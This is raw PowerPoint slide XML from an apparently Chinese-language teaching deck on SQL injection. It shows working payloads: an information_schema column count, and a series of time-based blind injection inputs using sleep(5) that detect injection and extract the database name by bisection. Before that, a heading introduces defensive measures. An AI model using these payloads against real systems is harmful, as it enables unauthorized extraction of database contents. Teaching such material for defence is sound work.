                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>= ’users’)=8 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示存在</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>个字段。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4294255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966479" y="837929"/>
            <a:ext cx="2925802" cy="474140"/>
            <a:chOff x="4966479" y="837929"/>
            <a:chExt cx="2925802"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4966479" y="837929"/>
              <a:ext cx="2925802"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基于时间的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SQL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盲注</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="1528093"/>
            <a:ext cx="11161240" cy="5123647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>也可以使用基于时间的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>盲注</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>首先判断是否存在注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，注入是字符型还是数字型：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1’and sleep(5) #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，感觉到明显延迟</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1 and sleep(5) #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，没有延迟</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    说明存在字符型的基于时间的盲注。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>猜解当前数据库名字长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1’ and if(length(database())=1,sleep(5),1) #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>没有延迟</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1’ and if(length(database())=4,sleep(5),1) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>明显延迟</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>采用二分法猜解数据库名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1’ and if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(database(),1,1))&gt;97,sleep(5),1)# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>明显延迟</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>以此类推，猜解表、字段和数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1324472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1388815" y="2896245"/>
            <a:ext cx="10441160" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5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知识点四：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5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注入的防御措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="956457335"/>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101551" y="1667891"/>
            <a:ext cx="10657184" cy="702773"/>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由于越来越多的攻击利用了</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注入技术，也随之产生了很多试图解决注入漏洞的方案。目前被提出的方案有</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E99E241B-4002-4B98-89C1-8A6F31F8AFDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596727" y="808013"/>
            <a:ext cx="2231857" cy="508862"/>
            <a:chOff x="1420106" y="1402730"/>
            <a:chExt cx="2231857" cy="508862"/>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2568651" y="828281"/>
              <a:ext cx="508861" cy="1657762"/>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2053958" y="1402731"/>
              <a:ext cx="1598005"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防御措施</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3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23" name="insert-table_64301">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DDC27AF-CEF9-4AEA-8401-5F19406780A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="746845" y="858132"/>
            <a:ext cx="378654" cy="379982"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2764 w 5941"/>
              <a:gd name="T1" fmla="*/ 0 h 5971"/>
              <a:gd name="T2" fmla="*/ 2560 w 5941"/>
              <a:gd name="T3" fmla="*/ 1500 h 5971"/>
              <a:gd name="T4" fmla="*/ 0 w 5941"/>
              <a:gd name="T5" fmla="*/ 1735 h 5971"/>
              <a:gd name="T6" fmla="*/ 234 w 5941"/>
              <a:gd name="T7" fmla="*/ 5971 h 5971"/>
              <a:gd name="T8" fmla="*/ 4471 w 5941"/>
              <a:gd name="T9" fmla="*/ 5736 h 5971"/>
              <a:gd name="T10" fmla="*/ 5737 w 5941"/>
              <a:gd name="T11" fmla="*/ 3269 h 5971"/>
              <a:gd name="T12" fmla="*/ 5941 w 5941"/>
              <a:gd name="T13" fmla="*/ 203 h 5971"/>
              <a:gd name="T14" fmla="*/ 2967 w 5941"/>
              <a:gd name="T15" fmla="*/ 408 h 5971"/>
              <a:gd name="T16" fmla="*/ 4036 w 5941"/>
              <a:gd name="T17" fmla="*/ 956 h 5971"/>
              <a:gd name="T18" fmla="*/ 2967 w 5941"/>
              <a:gd name="T19" fmla="*/ 408 h 5971"/>
              <a:gd name="T20" fmla="*/ 4036 w 5941"/>
              <a:gd name="T21" fmla="*/ 1359 h 5971"/>
              <a:gd name="T22" fmla="*/ 2967 w 5941"/>
              <a:gd name="T23" fmla="*/ 1907 h 5971"/>
              <a:gd name="T24" fmla="*/ 2967 w 5941"/>
              <a:gd name="T25" fmla="*/ 2314 h 5971"/>
              <a:gd name="T26" fmla="*/ 4036 w 5941"/>
              <a:gd name="T27" fmla="*/ 2862 h 5971"/>
              <a:gd name="T28" fmla="*/ 2967 w 5941"/>
              <a:gd name="T29" fmla="*/ 2314 h 5971"/>
              <a:gd name="T30" fmla="*/ 469 w 5941"/>
              <a:gd name="T31" fmla="*/ 5502 h 5971"/>
              <a:gd name="T32" fmla="*/ 2560 w 5941"/>
              <a:gd name="T33" fmla="*/ 1969 h 5971"/>
              <a:gd name="T34" fmla="*/ 1912 w 5941"/>
              <a:gd name="T35" fmla="*/ 3654 h 5971"/>
              <a:gd name="T36" fmla="*/ 1563 w 5941"/>
              <a:gd name="T37" fmla="*/ 3376 h 5971"/>
              <a:gd name="T38" fmla="*/ 1152 w 5941"/>
              <a:gd name="T39" fmla="*/ 4717 h 5971"/>
              <a:gd name="T40" fmla="*/ 1249 w 5941"/>
              <a:gd name="T41" fmla="*/ 4843 h 5971"/>
              <a:gd name="T42" fmla="*/ 2544 w 5941"/>
              <a:gd name="T43" fmla="*/ 4499 h 5971"/>
              <a:gd name="T44" fmla="*/ 2589 w 5941"/>
              <a:gd name="T45" fmla="*/ 4332 h 5971"/>
              <a:gd name="T46" fmla="*/ 3148 w 5941"/>
              <a:gd name="T47" fmla="*/ 3269 h 5971"/>
              <a:gd name="T48" fmla="*/ 4002 w 5941"/>
              <a:gd name="T49" fmla="*/ 5502 h 5971"/>
              <a:gd name="T50" fmla="*/ 4465 w 5941"/>
              <a:gd name="T51" fmla="*/ 2862 h 5971"/>
              <a:gd name="T52" fmla="*/ 5534 w 5941"/>
              <a:gd name="T53" fmla="*/ 2314 h 5971"/>
              <a:gd name="T54" fmla="*/ 5534 w 5941"/>
              <a:gd name="T55" fmla="*/ 1907 h 5971"/>
              <a:gd name="T56" fmla="*/ 4465 w 5941"/>
              <a:gd name="T57" fmla="*/ 1359 h 5971"/>
              <a:gd name="T58" fmla="*/ 5534 w 5941"/>
              <a:gd name="T59" fmla="*/ 1907 h 5971"/>
              <a:gd name="T60" fmla="*/ 4465 w 5941"/>
              <a:gd name="T61" fmla="*/ 956 h 5971"/>
              <a:gd name="T62" fmla="*/ 5534 w 5941"/>
              <a:gd name="T63" fmla="*/ 408 h 5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41" h="5971">
                <a:moveTo>
                  <a:pt x="5737" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2764" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2652" y="0"/>
                  <a:pt x="2560" y="91"/>
                  <a:pt x="2560" y="203"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2560" y="1500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234" y="1500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="1500"/>
                  <a:pt x="0" y="1605"/>
                  <a:pt x="0" y="1735"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="5736"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="5866"/>
                  <a:pt x="105" y="5971"/>
                  <a:pt x="234" y="5971"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4236" y="5971"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4366" y="5971"/>
                  <a:pt x="4471" y="5866"/>
                  <a:pt x="4471" y="5736"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4471" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5737" y="3269"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5849" y="3269"/>
                  <a:pt x="5941" y="3177"/>
                  <a:pt x="5941" y="3065"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5941" y="203"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5941" y="91"/>
                  <a:pt x="5849" y="0"/>
                  <a:pt x="5737" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2967" y="408"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4036" y="408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4036" y="956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="408"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2967" y="1359"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4036" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4036" y="1907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="1907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="1359"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2967" y="2314"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4036" y="2314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4036" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="2314"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4002" y="5502"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="469" y="5502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469" y="1969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2560" y="1969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2560" y="3006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1912" y="3654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1660" y="3402"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1634" y="3377"/>
                  <a:pt x="1597" y="3367"/>
                  <a:pt x="1563" y="3376"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1528" y="3385"/>
                  <a:pt x="1501" y="3412"/>
                  <a:pt x="1492" y="3447"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1152" y="4717"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1143" y="4751"/>
                  <a:pt x="1152" y="4788"/>
                  <a:pt x="1178" y="4813"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1197" y="4833"/>
                  <a:pt x="1222" y="4843"/>
                  <a:pt x="1249" y="4843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1257" y="4843"/>
                  <a:pt x="1266" y="4842"/>
